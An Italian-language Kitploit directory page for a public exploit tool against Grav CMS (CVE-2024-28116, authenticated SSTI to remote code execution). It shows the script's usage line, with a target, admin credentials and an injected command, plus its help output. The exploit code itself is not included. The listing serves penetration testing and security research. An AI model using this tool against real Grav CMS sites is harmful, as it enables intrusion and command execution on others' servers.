Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Grav-CMS-RCE-Authenticated — Exploit contro Grav CMS (versioni inferiori alla 1.7.45) che consente l'esecuzione remota di codice per un utente autenticato - CVE-2024-28116 | Kitploit
Strumenti/GitHubGitHub/gunzf0x/grav-cms-rce-authenticated
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubgunzf0x/grav-cms-rce-authenticated

Grav-CMS-RCE-Authenticated

Exploit contro Grav CMS (versioni inferiori alla 1.7.45) che consente l'esecuzione remota di codice per un utente autenticato - CVE-2024-28116

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 anno faNon ancora revisionato

Grav CMS Esecuzione di codice remoto (Autenticato) - CVE-2024-28116

Informazioni

Questo codice è un adattamento del repository GitHub Graver con alcuni miglioramenti basati su questo video.

Exploit contro Grav CMS (per versioni precedenti alla 1.7.45) basato su vulnerabilità SSTI + RCE, etichettato come CVE-2024-28116. Questo script crea una pagina con la vulnerabilità, la esegue e, infine, elimina la pagina dopo l'esecuzione.

Utilizzo

root@kitploit:~
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'

Messaggio di aiuto:

root@kitploit:~
$ python3 Grav_CMS_RCE.py -h

usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]

Grav CMS RCE (Authenticated).

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL where Grav CMS is running. Example: http://10.10.10.10
  -P PORT, --port PORT  Port running Grav CMS. Default: 80
  -u USERNAME, --username USERNAME
                        Username to authenticate in Grav CMS
  -p PASSWORD, --password PASSWORD
                        Password for the user in Grav CMS.
  -x COMMAND, --command COMMAND
                        Command to inject/run.
  --no-delete-file      Do NOT delete the generated files. Useful to check command execution output.
  --panel-route PANEL_ROUTE
                        Admin Panel route in Grav CMS. Default: /admin
  --show-warnings       Show warnings (if there are).

Se per qualche motivo non vogliamo eliminare i file generati, possiamo usare il flag --no-delete-file, visitare la pagina indicata dallo script e leggere l'output del comando.

Ulteriori informazioni

Maggiori informazioni su CVE-2024-28116 e questo exploit:

  • Testato su Grav CMS v1.7.44 - Admin 1.10.44.
  • https://github.com/akabe1/Graver
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28116
  • https://ethicalhacking.uk/videos/CVE-2024-28116/#gsc.tab=0
  • https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh

Avvertenza

Il proprietario di questo repository non è responsabile per l'uso di questo software. È stato creato solo a scopo educativo.

Licenza

  • MIT
Scarica lo strumento